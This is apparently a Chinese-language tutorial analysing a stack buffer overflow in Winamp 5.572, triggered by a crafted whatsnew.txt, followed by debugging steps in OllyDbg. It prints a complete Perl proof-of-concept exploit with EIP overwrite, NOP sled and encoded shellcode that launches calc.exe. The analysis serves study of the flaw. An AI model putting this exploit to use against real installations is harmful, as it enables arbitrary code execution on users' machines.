Winamp作为一款在90年代最主流的音乐播放器,到现在仍有大量的忠实粉丝。当然也存在很多漏洞。下面具体分析的就是打开软件的更新历史信息而触发的一个缓冲区溢出漏洞。
0X01漏洞重现
正常的whatsnew.txt文件位于Winamp
文件夹中,保存的是软件的更新历史信息。我们为了重现漏洞,需要将特殊构造的whatsnew.txt覆盖掉原始的txt文件
。然后打开Winamp,在菜单栏的HELP中选择“About Winamp”,在弹出的对话框中选择“Version history”。就触发了漏洞利用代码,弹出来一个作为测试用的计算器。在此感谢i春秋提供的实现环境以及POC代码。
0X02漏洞利用代码分析
既然我们已经触发了漏洞,那么我们可以进一步分析一下漏洞出现的原因。查看一下它的POC代码,是利用Perl语言编写的:
my $version = "Winamp 5.572"; my $junk = "x41" x 540; my $eip = "xadx86x0ex07"; # overwrite EIP - 070E86AD FFD4 CALL ESP nde.dll my $nop = "x90" x 100; my $shellcode = # windows/exec cmd=calc.exe "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49". "x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax47". "x58x30x42x31x50x42x41x6bx42x41x57x42x32x42x41x32". "x41x41x30x41x41x58x50x38x42x42x75x78x69x6bx4cx6a". "x48x53x74x67x70x67x70x75x50x4ex6bx53x75x65x6cx6e". "x6bx51x6cx46x65x70x78x43x31x68x6fx4ex6bx30x4fx54". "x58x6ex6bx73x6fx57x50x67x71x58x6bx77x39x4cx4bx64". "x74x6cx4bx57x71x5ax4ex76x51x49x50x6ex79x6ex4cx4f". "x74x4bx70x70x74x37x77x69x51x48x4ax64x4dx43x31x4f". "x32x7ax4bx48x74x55x6bx72x74x34x64x77x74x70x75x4d". "x35x6cx4bx71x4fx75x74x36x61x48x6bx41x76x4cx4bx44". "x4cx70x4bx4ex6bx63x6fx55x4cx33x31x68x6bx4ex6bx35". "x4cx4ex6bx34x41x6ax4bx6cx49x33x6cx35x74x64x44x4a". "x63x34x71x4bx70x63x54x6ex6bx71x50x76x50x4fx75x4b". "x70x72x58x74x4cx4cx4bx77x30x76x6cx4cx4bx44x30x57". "x6cx6cx6dx6ex6bx75x38x54x48x58x6bx73x39x6ex6bx4b". "x30x4ex50x37x70x67x70x37x70x6cx4bx62x48x45x6cx63". "x6fx35x61x39x66x35x30x50x56x4dx59x48x78x6ex63x59". "x50x43x4bx66x30x43x58x68x70x6fx7ax43x34x33x6fx73". "x58x4fx68x6bx4ex6dx5ax46x6ex72x77x6bx4fx78x67x63". "x53x62x41x30x6cx55x33x64x6ex42x45x70x78x32x45x33". "x30x47"; open (myfile,'>> whatsnew.txt'); print myfile $version.$junk.$eip.$nop.$shellcode; print "[+] whatsnew.txt written. "; print "[ ] Now copy it to your winamp folder... "; print "[ ] Run winamp and hit [About Winamp]->[Version History] ";
首先看一下倒数第四条语句,它其实是漏洞利用的代码的格式,一共是五块内容,即version+junk+eip+nop+shellcode。其中的version是当前软件的版本,这里是5.572版;junk是一段填充代码,这里是540个0x41,也就是大写字母A,填充的作用就是为了接下来的返回地址的覆盖;eip则是我们将要覆盖的
返回地址,这里是0x070e86ad;nop位置是100个0x90;最后就是ShellCode
代码了。
0X03漏洞的调试
为了调试这个漏洞,我们可以结合构造好的whatsnew.txt
进行。
首先是定位漏洞出现的位置,然后在相应的位置下断点进行分析。我们以前的做法是在类似于strcpy这一类的函数上下断点
,然后逐个断点进行分析,或者在类似于fopen这样的函数上下断点。当然方法是五花八门的,不管是哪种方法,基本都是可以达到目的的。那么针对于这次的程序来说,既然我们已经知道程序会打开whatsnew.txt这个文件,那么不妨在程序中查找一下这个字符串,然后再进行分析。
首先利用OD
载入winamp.exe程序,在反汇编代码区域单击鼠标右键,选择“查找”中的“所有参考文本字串”。
之后选择最上面的条目,表示从最开始位置进行搜索。单击鼠标右键,选择“查找文本”,输入我们要查找的字符串名称“whatsnew.txt”
,再单击确定:
接下来我们可以分别查看一下这两处语句。可能这两处语句本身并不是fopen函数的参数语句,不过没有关系,相信距离fopen
也不会太远。首先双击第一个结果,来到其反汇编代码的位置,然后在该位置上下观察一下,就可以找到疑似文件打开语句的位置了:
可以先在0x004015EE处下一个断点,然后按F9
让程序运行起来,依据之前讲过的步骤来触发漏
洞,于是程序就停在了0x004015EE的位置。这里最开始是利用malloc
语句申请大小为0x20000
的内存空间,返回值就是所分配的空间的地址,我这里是0x0286C008。之后调用wfopen来打开
whatsnew.txt
文件。再调用fread函数。通过分析这个函数的参数可以知道,fread函数会将文件内容读入刚才所分配的空间中。然后利用strncmp
函数进行比对:
可见,这里是在验证所读取的whatsnew.txt
文件的最开始9个字符是否为“Winamp 5.”验证通过才能够进行下一步的操作。这也就说明了,为什么需要在漏洞利用的代码中,添加version的信息。然后就来到了最重要的字符串拷贝函数的位置:
这里是将从whatsnew.txt文件读取出来的内容拷贝到地址为0x00BDEBAC的位置中。我们可以按
F8
步过这个函数来看一下:
可以看到程序使用的是call esp
的方法,此时的esp所保存的地址为0x00BDEDE8,正好落在了
0x90也就是nop的区段中,在这些0x90的后面,就是ShellCode了。
0X04总结
这次我们所讨论的是建立在他人ShellCode
代码基础上的漏洞分析。可见即便是前辈高人的代码
,也不见得就很管用。因此这就需要我们不断地进行尝试与研究,将他人的思想学到手,才能够
不断地提高。